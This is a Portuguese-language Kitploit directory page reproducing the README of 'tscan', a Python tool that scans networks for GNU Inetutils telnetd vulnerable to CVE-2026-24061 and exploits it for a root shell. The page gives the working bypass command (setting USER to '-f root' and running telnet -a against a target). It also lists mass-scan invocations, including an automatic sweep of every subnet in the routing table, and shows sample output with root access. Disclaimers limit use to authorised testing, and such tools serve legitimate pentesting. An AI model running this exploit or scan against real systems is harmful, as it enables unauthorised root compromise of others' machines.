Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
tscan — Scanner baseado em Python que deteta e explora a bypass de autenticação telnetd CVE-2026-24061, permitindo acesso a uma shell root em serviços GNU Inetutils vulneráveis. | Kitploit
Ferramentas/GitHubGitHub/cumakurt/tscan
ReconhecimentoScanners de VulnerabilidadesEscaneamento de PortasExploraçãoSegurança de RedeTestes de PenetraçãoAprendizado e Educação
GitHubcumakurt/tscan

tscan

Scanner baseado em Python que deteta e explora a bypass de autenticação telnetd CVE-2026-24061, permitindo acesso a uma shell root em serviços GNU Inetutils vulneráveis.

Ver Repositório
1há 7 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Scanner de Bypass de Autenticação Telnetd (CVE-2026-24061)

Um scanner baseado em Python para detectar e explorar a vulnerabilidade CVE-2026-24061 em serviços telnetd do GNU Inetutils. Esta ferramenta verifica endereços IP ou redes em busca de serviços telnetd vulneráveis que permitem bypass de autenticação, resultando em acesso root ao shell.


⚠️ AVISO LEGAL IMPORTANTE E ISENÇÃO DE RESPONSABILIDADE

ESTE SOFTWARE É FORNECIDO APENAS PARA FINS EDUCACIONAIS E DE TESTES DE SEGURANÇA AUTORIZADOS.

1. Propósito Educacional

Esta aplicação foi desenvolvida exclusivamente para fins educacionais para demonstrar vulnerabilidades de segurança e auxiliar em testes de segurança e pesquisas autorizados.

2. Sem Garantia

ESTE SOFTWARE É FORNECIDO "NO ESTADO EM QUE SE ENCONTRA", SEM GARANTIA DE QUALQUER TIPO, EXPRESSA OU IMPLÍCITA, INCLUINDO, MAS NÃO SE LIMITANDO A, GARANTIAS DE COMERCIABILIDADE, ADEQUAÇÃO A UM FIM ESPECÍFICO E NÃO VIOLAÇÃO. OS AUTORES E COLABORADORES NÃO GARANTEM QUE O SOFTWARE SERÁ LIVRE DE ERROS, SEGURO OU FUNCIONAL. O software pode conter bugs, erros ou outros defeitos.

3. Responsabilidade do Usuário

TODA A RESPONSABILIDADE E OBRIGAÇÃO PELO USO DESTE SOFTWARE RECAI INTEGRALMENTE SOBRE O USUÁRIO. Os autores, colaboradores e distribuidores deste software não serão responsabilizados por quaisquer danos, perdas ou consequências legais resultantes do uso, uso indevido ou incapacidade de usar este software.

4. Uso Não Autorizado Proibido

Esta ferramenta deve ser usada SOMENTE em sistemas que você possui ou para os quais possui permissão explícita por escrito para testar. O acesso não autorizado a sistemas de computador é ilegal e pode resultar em processo criminal.

5. Sem Garantias

Os autores NÃO garantem:

  • A precisão dos resultados da varredura
  • A segurança da própria aplicação
  • Compatibilidade com todos os sistemas
  • Ausência de bugs ou erros
  • Qualquer funcionalidade ou desempenho específico

Ao usar este software, você reconhece que leu, entendeu e concorda em ficar vinculado a estes termos. Se você não concorda, não use este software.


Desenvolvedor

Desenvolvido por: Cuma KURT
E-mail: [email protected]
LinkedIn: https://www.linkedin.com/in/cuma-kurt-34414917/

Informações da Vulnerabilidade

CVE-2026-24061: O telnetd do GNU Inetutils até a versão 2.7 permite bypass de autenticação remota por meio de um valor -f root para a variável de ambiente USER.

Pontuação CVSS: 9.8 (Crítica)

Referência: NVD CVE-2026-24061

Recursos

  • 🔍 Varredura de Portas: Detecta portas telnet abertas (padrão: 23, personalizável)
  • 🎯 Detecção de Vulnerabilidade: Testa a explorabilidade da CVE-2026-24061
  • ⚡ Multithread: Varredura concorrente rápida com contagem de threads configurável
  • 📁 Entrada Flexível: Suporta endereços IP, redes CIDR e listas de alvos baseadas em arquivos
  • 🗺️ Detecção Automática: Detecta e varre automaticamente sub-redes da tabela de roteamento
  • 🛑 Interrupção Segura: Ctrl+C interrompe a varredura com segurança e mostra resultados parciais
  • 📊 Progresso em Tempo Real: Barra de progresso com estatísticas e descobertas

Instalação

Pré-requisitos

  • Python 3.6 ou superior
  • Cliente telnet (geralmente pré-instalado em Linux/macOS)

Instalar Dependências

root@kitploit:~
pip3 install -r requirements.txt

Nota: A maioria das dependências faz parte da biblioteca padrão do Python. A ferramenta funciona imediatamente com Python 3.6+.

Uso

Uso Básico

root@kitploit:~
# Verificar um único endereço IP
python3 tscan.py 192.168.1.1

# Verificar uma rede CIDR
python3 tscan.py 192.168.1.0/24

# Verificar com porta personalizada
python3 tscan.py -p 2323 192.168.1.1

# Verificar alvos de um arquivo
python3 tscan.py targets.txt

# Verificar múltiplos endereços IP
python3 tscan.py 192.168.1.1 10.0.0.1 172.16.0.1

# Verificar múltiplas redes CIDR
python3 tscan.py 192.168.1.0/24 10.0.0.0/16

Ajuste de Desempenho

root@kitploit:~
# Aumentar o número de threads para varredura mais rápida (100 threads)
python3 tscan.py -t 100 192.168.1.0/24

# Aumentar o timeout para redes lentas
python3 tscan.py --timeout 10 192.168.1.0/24

# Combinar ambos para varreduras de redes grandes
python3 tscan.py -t 200 --timeout 8 10.0.0.0/16

Modo de Detecção Automática

root@kitploit:~
# Detectar e verificar automaticamente todas as sub-redes da tabela de roteamento do sistema
python3 tscan.py --auto
# ou use a forma abreviada:
python3 tscan.py -a

# Detecção automática com porta personalizada
python3 tscan.py --auto -p 2323
# ou:
python3 tscan.py -a -p 2323

# Detecção automática com alto número de threads
python3 tscan.py --auto -t 200
# ou:
python3 tscan.py -a -t 200

Nota: O modo --auto lê a tabela de roteamento do sistema usando o comando ip route list ou route -n e verifica automaticamente todas as sub-redes detectadas.

Exemplos do Mundo Real

root@kitploit:~
# Exemplo 1: Varredura rápida da rede local
python3 tscan.py 192.168.1.0/24

# Exemplo 2: Varredura rápida com alta concorrência
python3 tscan.py -t 300 --timeout 3 10.0.0.0/16

# Exemplo 3: Verificar porta telnet não padrão
python3 tscan.py -p 2323 192.168.1.0/24

# Exemplo 4: Detectar e verificar automaticamente todas as sub-redes da rede local
python3 tscan.py --auto
# ou:
python3 tscan.py -a

# Exemplo 5: Detecção automática com configurações personalizadas
python3 tscan.py --auto -p 2323 -t 100 --timeout 8
# ou:
python3 tscan.py -a -p 2323 -t 100 --timeout 8

Opções de Linha de Comando

root@kitploit:~
argumentos posicionais:
  targets               Endereço(s) IP, rede(s) CIDR ou caminho(s) de arquivo(s) contendo alvos

opções:
  -h, --help            Mostra esta mensagem de ajuda e sai
  -p, --port PORT       Porta telnet para verificar (padrão: 23)
  -t, --threads THREADS Número de threads concorrentes (padrão: 50)
  --timeout TIMEOUT     Timeout de conexão em segundos (padrão: 5)
  -v, --verbose         Saída detalhada
  -a, --auto            Detecta e verifica automaticamente todas as sub-redes da tabela de roteamento do sistema (route -n ou ip route list)

Formato do Arquivo de Entrada

Crie um arquivo de texto com um alvo por linha:

root@kitploit:~
192.168.1.1
192.168.1.0/24
10.0.0.1
172.16.0.0/16

Linhas que começam com # são tratadas como comentários e ignoradas.

Saída

A ferramenta fornece:

  1. Progresso em Tempo Real: Mostra os resultados à medida que são descobertos

    • Barra de progresso com porcentagem e estatísticas
    • Contagem de hosts vulneráveis exibida na barra de progresso
    • [!] - Host vulnerável
    • [~] - Porta aberta, mas não vulnerável
    • Alvos com porta fechada são ignorados silenciosamente
    • Ctrl+C (KeyboardInterrupt): Interrompe a varredura com segurança e mostra os resultados parciais imediatamente
  2. Relatório Resumido: Inclui:

    • Total de serviços telnet encontrados
    • Número de hosts vulneráveis
    • Lista detalhada de hosts vulneráveis

Exemplo de Saída

Saída Básica da Varredura

root@kitploit:~
[*] Iniciando varredura em 256 alvo(s)...
[*] Porta: 23, Threads: 50, Timeout: 5s

[*] Progresso: [████████████████░░░░░░░░░░░░░░░░░░░░] 40.0% (102/256) | Abertas: 2 | Vulneráveis: 1
[!] 192.168.1.100:23 - VULNERÁVEL
[*] Progresso: [████████████████████████████████████] 100.0% (256/256) | Abertas: 3 | Vulneráveis: 1
[+] Varredura concluída: 256/256 alvos verificados

======================================================================
Resumo dos Resultados da Varredura
======================================================================

Serviços telnet encontrados: 3
Hosts vulneráveis: 1

[!] HOSTS VULNERÁVEIS:

  ● 192.168.1.100:23
    Saída: uid=0(root) gid=0(root) groups=0(root)...

[~] Serviços telnet encontrados, mas não vulneráveis:

  ● 192.168.1.101:23
  ● 192.168.1.102:23

[*] Varredura concluída em 12.34 segundos

Como Funciona

  1. Detecção de Porta: Verifica se a porta telnet está aberta nos IPs alvo
  2. Tentativa de Exploração: Para portas abertas, tenta o exploit da CVE-2026-24061:
    • Define a variável de ambiente USER="-f root"
    • Conecta via comando telnet -a
    • Envia comandos de teste para verificar o acesso ao shell root
  3. Classificação de Resultados: Categoriza os resultados como vulneráveis ou não vulneráveis

Detalhes do Exploit

A vulnerabilidade permite bypass de autenticação definindo a variável de ambiente USER como -f root:

root@kitploit:~
USER="-f root" telnet -a IP_ALVO [PORTA]

Isso faz com que o telnetd interprete a variável USER como uma flag, ignorando a autenticação e concedendo acesso root.

Limitações

  • Requer o cliente telnet instalado
  • Funciona apenas contra versões vulneráveis do telnetd (≤ 2.7)
  • O modo de detecção automática requer o comando ip route list ou route -n

Solução de Problemas

"comando telnet não encontrado"

Instale o cliente telnet:

root@kitploit:~
# Debian/Ubuntu
sudo apt-get install telnet

# CentOS/RHEL
sudo yum install telnet

# macOS
# Geralmente pré-instalado

Nenhum resultado encontrado

  • Verifique se os alvos estão acessíveis
  • Verifique as regras do firewall
  • Garanta que os serviços telnet estejam realmente em execução
  • Tente aumentar o timeout: --timeout 10

Uso Legal e Ético

Esta ferramenta destina-se a:

  • ✅ Testes de penetração autorizados
  • ✅ Pesquisa de segurança em seus próprios sistemas
  • ✅ Avaliação de vulnerabilidades com autorização adequada
  • ✅ Fins educacionais em ambientes controlados

NÃO use esta ferramenta para:

  • ❌ Acesso não autorizado a sistemas
  • ❌ Atividades ilegais de hacking
  • ❌ Qualquer atividade sem permissão explícita

Referências

  • Detalhes da CVE-2026-24061
  • Análise do SafeBreach Labs

Licença

Este programa é software livre: você pode redistribuí-lo e/ou modificá-lo sob os termos da Licença Pública Geral GNU conforme publicada pela Free Software Foundation, seja a versão 3 da Licença, ou (a seu critério) qualquer versão posterior.

Este programa é distribuído na esperança de que seja útil, mas SEM NENHUMA GARANTIA; sem sequer a garantia implícita de COMERCIABILIDADE ou ADEQUAÇÃO A UM DETERMINADO FIM. Consulte a Licença Pública Geral GNU para mais detalhes.

Você deve ter recebido uma cópia da Licença Pública Geral GNU junto com este programa. Se não, veja https://www.gnu.org/licenses/.

Texto Completo da Licença

Consulte o arquivo LICENSE para o texto completo da Licença Pública Geral GNU v3.0.

Isenção de Responsabilidade

OS AUTORES E COLABORADORES NÃO SÃO RESPONSÁVEIS POR QUALQUER USO INDEVIDO OU DANO CAUSADO POR ESTA FERRAMENTA.

Esta ferramenta é fornecida APENAS PARA FINS EDUCACIONAIS E DE TESTES DE SEGURANÇA AUTORIZADOS.

USE POR SUA CONTA E RISCO. Toda a responsabilidade e obrigação pelo uso deste software recai integralmente sobre o usuário. Os autores não garantem a precisão, segurança ou funcionalidade deste software. O software é fornecido "NO ESTADO EM QUE SE ENCONTRA", sem qualquer garantia de qualquer tipo.

Esta aplicação foi desenvolvida exclusivamente para fins educacionais. Ao usar este software, você reconhece que:

  • Você entende que esta é uma ferramenta educacional
  • Toda a responsabilidade pelo seu uso é sua
  • Os autores não fornecem garantias ou seguranças
  • Você só o usará em sistemas que possui ou para os quais possui permissão explícita por escrito para testar
  • O uso não autorizado é ilegal e pode resultar em processo criminal

Se você não concorda com estes termos, NÃO USE ESTE SOFTWARE.

Baixar ferramenta